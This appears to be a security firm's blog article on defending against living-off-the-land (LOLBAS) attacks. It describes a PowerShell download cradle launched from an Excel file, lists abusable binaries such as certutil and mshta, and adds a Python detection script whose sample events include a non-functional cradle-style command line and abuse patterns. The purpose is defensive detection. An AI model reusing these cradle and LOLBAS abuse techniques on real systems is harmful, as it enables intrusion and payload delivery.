Defending against LOLBAS attacks

Francisco Vasquez | 9/6/2023

Understanding LOLBAS is the key difference between spotting real threats and dismissing them as false positives.

In the ever-changing landscape of cybersecurity, organizations face relentless threats from sophisticated adversaries. To combat these threats effectively, a multilayered defense approach is crucial. One such powerful combination is the integration of managed detection and response (MDR) with the concept of living off the land binaries (LOLBins) and executables. By combining MDR with knowledge of LOL attacks, organizations can improve their security posture and cyber resilience.

From LOLBins to LOLBAS

LOLBins are legitimate executables or binaries commonly used on operating systems that attackers can misuse to carry out malicious activities. Since these binaries are part of the operating system or legitimate software, they often bypass traditional security measures and are difficult to detect if they are performing malicious activity. Attackers can abuse LOLBins to execute commands, escalate privileges, move laterally within a network, or even achieve persistence.

Threat actors use legitimate binaries to blend in with normal system behavior and make it difficult for security solutions to differentiate between legitimate and malicious activities. Over time, the original concept of LOLBins has expanded to include scripts and libraries, and thus the name has evolved to “living off the land binaries and scripts” (LOLBAS).

MDR and the importance of understanding LOLBAS 

MDR is a cybersecurity service that combines advanced technologies and human expertise to continually monitor and detect cyberthreats. MDR providers use threat detection tools, analytics, and threat intelligence to identify suspicious activities, perform incident investigations, and respond effectively to security incidents. It offers organizations proactive threat hunting, continuous monitoring, incident response, and access to cybersecurity professionals.

For MDR to be effective, security teams need to be aware of LOLBAS and understand their use on different operating systems. By monitoring and analyzing the behavior of LOLBAS, security professionals can detect anomalous or suspicious activities and identify potential attacks.

They can also employ techniques such as application control, behavior monitoring, and anomaly detection to detect and mitigate the misuse of LOLBAS.

How LOLBAS attacks work

Microsoft PowerShell™ is a powerful yet common LOLBAS that threat actors abuse. Although PowerShell is a scripting language that is regularly used for building, testing, and deploying solutions, it can also execute fileless malware on systems without leaving a trace. Note that PowerShell’s qualification for the official LOLBAS list is disputed. However, based on how easily it can be abused, it’s important to scrutinize it as such.

In the following process tree of an observed attack, the user opens a malicious Microsoft Excel™ file from Microsoft Outlook™, which then spawns a PowerShell process that reaches out to the internet, downloads a malicious payload onto the system, and allows a command and control session to initiate.

PowerShell attack process breakdown

[Figure: PowerShell attack process flowchart. Source: Crowe analysis, August 2023]

The following piece of code demonstrates how the payload was downloaded and executed in the system, providing a command and control session for the attacker.

[Image: screenshot of the PowerShell command line observed in the attack]

On the command line, PowerShell is called by its full file system path and first pings google.com to check for internet connectivity. Once connectivity is confirmed, a virtual-based security file payload is downloaded to and executed from the user’s temp folder, establishing a command and control session. The PowerShell download cradle is obfuscated with regex and string concatenation, so the telltale strings are split into separate fragments. The strings are also written in reverse and read from right to left to confuse the antivirus solution in place. By using PowerShell, the threat actor gains a basic foothold on the system with little to no detection.

Thwarting PowerShell attacks

Microsoft introduced security updates to PowerShell in version 5.0 and implemented further enhancements in PowerShell 7.0, as well as in Microsoft Defender™ and its Antimalware Scan Interface (AMSI). These updates have made it more difficult for bad actors to abuse PowerShell.

Information security (or blue) teams can use enhanced logging features and implement preventive controls such as PowerShell ConstrainedLanguage mode, Microsoft Windows™ AppLocker™, and Windows Defender Application Control to fend off PowerShell attacks.

Other LOLBAS entry points

Beyond PowerShell, attackers abuse other native tools on common operating systems for nefarious purposes. Of the 184 currently known and tracked LOLBAS (including the 376 known abusable Unix™ binaries), a few common ones that organizations should watch for include:

  • Rundll32/Regsvr32 can be used to download, register, and run dynamic-link libraries (DLLs), which are essentially mini executables used as building blocks for larger programs.
  • Msiexec/Bitsadmin can be used by a macro to download the first stage of a payload and execute it.
  • Certutil can be used to decode a file from base64 and output it to a specified file type.
  • Wmic can be used to execute commands remotely and exfiltrate information.
  • Wget can be used for downloading payloads from the internet.
  • Wscript/Mshta can be used to execute scripts, typically via Word document macros.
  • Msbuild can be used to compile and execute code on the fly.
  • Procdump can be used to create a memory dump of sensitive programs to access the keys and passwords they are using.
  • Rm can be used for deleting files from a Unix or Linux™ file system.
  • Cp can be used to perform privileged reads to disclose files, or writes to files outside a restricted file system.
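As an added example (not code from the original article or from Crowe), the following Python script turns the traits of the PowerShell cradle described in the process tree above and the LOLBAS list just given into detection logic run over constructed process-creation events. The Office parent names, the regular expressions and the three-trait alert threshold are assumptions to tune per environment.

```python
import re

OFFICE_PARENTS = ("excel.exe", "winword.exe", "outlook.exe", "powerpnt.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")

# Traits of the cradle described above (hidden window, connectivity check, concatenated and reversed strings, download plus in-memory execution); any one alone is often benign.
PS_INDICATORS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "connectivity_check": re.compile(r"\bping\b", re.I),
    "string_concat": re.compile(r"['\"]\s*\+\s*['\"]"),
    "string_reversal": re.compile(r"\[array\]::reverse|\[-1\s*\.\.\s*-", re.I),
    "download": re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I),
    "in_memory_exec": re.compile(r"\biex\b|invoke-expression", re.I),
}

# Other LOLBAS from the list above, with argument patterns that point to abuse rather than routine administration (illustrative patterns; tune per environment).
LOLBAS_ARGS = {
    "certutil.exe": re.compile(r"-decode|-urlcache", re.I),
    "mshta.exe": re.compile(r"https?:|vbscript:|javascript:", re.I),
    "bitsadmin.exe": re.compile(r"/transfer|/addfile", re.I),
    "msbuild.exe": re.compile(r"\.csproj\b|\.proj\b|\.xml\b", re.I),
}

def analyze_event(event):
    """Return the reasons a process-creation event looks like LOLBAS abuse ([] = nothing found)."""
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    reasons = []
    if parent in OFFICE_PARENTS and image in POWERSHELL + tuple(LOLBAS_ARGS):
        reasons.append(f"office parent {parent} spawned {image}")
    if image in POWERSHELL:
        hits = [name for name, rx in PS_INDICATORS.items() if rx.search(event["command_line"])]
        if len(hits) >= 3:  # the cradle stacks several traits; require that before alerting
            reasons.append("powershell cradle traits: " + ", ".join(hits))
    elif image in LOLBAS_ARGS and LOLBAS_ARGS[image].search(event["command_line"]):
        reasons.append(f"{image} invoked with abuse-pattern arguments")
    return reasons

# Constructed sample events in Sysmon Event ID 1 style (not real telemetry); the first command line is a deliberately non-functional sketch that carries the cradle's traits.
def ev(pid, parent, image, cmd):
    return {"pid": pid, "parent_image": parent, "image": image, "command_line": cmd}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ev(4120, r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE", PS, "powershell.exe -w hidden -c \"ping google.com; $u='http://'+'example.invalid'; $m=-join $s[-1..-14]; IEX (New-Object Net.WebClient).$m($u)\""),
    ev(4180, r"C:\Windows\explorer.exe", PS, r"powershell.exe -NoProfile -File C:\Scripts\Backup.ps1"),
    ev(4200, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe", r"certutil -decode C:\Users\Public\blob.txt C:\Users\Public\out.dll"),
    ev(4210, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe", "certutil -verify signed.cer"),
]
```

Running `analyze_event` over `SAMPLE_EVENTS` flags the Office-spawned cradle and the certutil decode while leaving the scheduled backup script and the certificate check alone.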

Addressing LOLBAS attacks with MDR

As organizations navigate the complex landscape of cybersecurity, integrating MDR services with knowledge of LOLBAS can be a game changer. Combining the power of continuous monitoring, proactive threat hunting, and real-time incident response with the ability to detect and mitigate LOL-based attacks can help organizations significantly enhance their security posture.

By embracing the dynamic MDR-LOLBAS duo, organizations can establish a robust defense against advanced adversaries and maintain a resilient security infrastructure.

Microsoft, AppLocker, Excel, Microsoft Defender, Outlook, PowerShell, and Windows are trademarks of the Microsoft group of companies.